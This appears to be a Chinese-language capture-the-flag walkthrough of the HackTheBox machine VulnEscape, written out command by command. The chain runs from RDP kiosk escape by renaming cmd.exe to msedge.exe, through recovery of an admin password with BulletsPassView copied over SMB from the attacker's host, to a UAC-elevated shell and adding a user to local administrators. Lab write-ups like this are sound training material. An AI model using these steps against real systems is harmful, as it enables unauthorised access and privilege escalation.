HTB VulnEscape:从Kiosk逃逸到UAC绕过完整攻击链分析

本文详细分析了HTB VulnEscape靶机的完整渗透过程,涵盖RDP服务探测、Kiosk模式逃逸技术、Remote Desktop Plus凭证提取、BulletsPassView密码恢复、UAC权限绕过等核心攻击技术。

HTB: VulnEscape

初始扫描

nmap扫描发现仅开放一个TCP端口:RDP(3389):

1
2
3
4
5
6
7
8
9

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-06 19:31 UTC
...[snip]...
Nmap scan report for 10.129.234.51
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-07-06 19:31:40 UTC for 14s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127

详细版本扫描显示Windows系统信息:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

oxdf@hacky$ nmap -p 3389 -sCV 10.129.234.51
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041

RDP连接与Kiosk模式

使用xfreerdp连接RDP服务:

1

xfreerdp /v:10.129.234.51 /dynamic-resolution +clipboard -sec-nla

发现Kiosk模式界面,使用无密码账户KioskUser0登录:

1
2

netexec rdp 10.129.234.51 -u KioskUser0 -p ''
RDP         10.129.234.51   3389   ESCAPE           [+] Escape\KioskUser0: (Pwn3d!)

Kiosk逃逸技术

启动Edge浏览器

通过Windows键打开开始菜单,搜索并启动Edge浏览器:

文件系统访问

在Edge地址栏输入C:访问文件系统,发现用户flag:

1

C:\Users\kioskUser0\Desktop\user.txt

获取Shell

C:\Windows\System32下载cmd.exe,重命名为msedge.exe绕过基于名称的允许列表:

1
2

PS C:\Windows\System32> copy cmd.exe C:\Users\kioskUser0\Downloads\
PS C:\Users\kioskUser0\Downloads> ren cmd.exe msedge.exe

成功执行重命名后的二进制文件获得shell。

权限提升

发现管理员凭证

在隐藏目录C:\_admin发现profiles.xml文件:

1
2
3
4
5
6
7
8
9

<?xml version="1.0" encoding="utf-16"?>
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>

使用BulletsPassView恢复密码

通过SMB共享下载BulletsPassView工具:

1
2
3

PS C:\> net use \\10.10.14.79\share /u:oxdf oxdf
PS C:\> copy \\10.10.14.79\share\BulletsPassView.exe C:\Users\kioskUser0\Downloads\
PS C:\> C:\Users\kioskUser0\Downloads\BulletsPassView.exe

工具成功显示被星号遮蔽的密码。

UAC绕过

使用runas命令以admin身份运行PowerShell:

1

PS C:\> runas /user:admin powershell

通过GUI方式绕过UAC限制:

1

start-process powershell.exe -verb runas

获得完全权限的管理员shell:

1
2
3

PS C:\> whoami /priv
SeDebugPrivilege                          Debug programs                     Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking           Enabled

获取Root Flag 

1
2

PS C:\Users\Administrator\Desktop> type root.txt
d46ea343************************

额外发现

语言设置调整

通过设置应用将系统语言从韩语改为英语。

Kiosk模式配置分析

将KioskUser0加入管理员组后查看Kiosk配置:

1

PS C:\> net localgroup administrators /add KioskUser0

发现Kiosk模式配置为以Edge全屏模式运行本地主机网站,并设置了基于名称的应用程序允许列表。

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次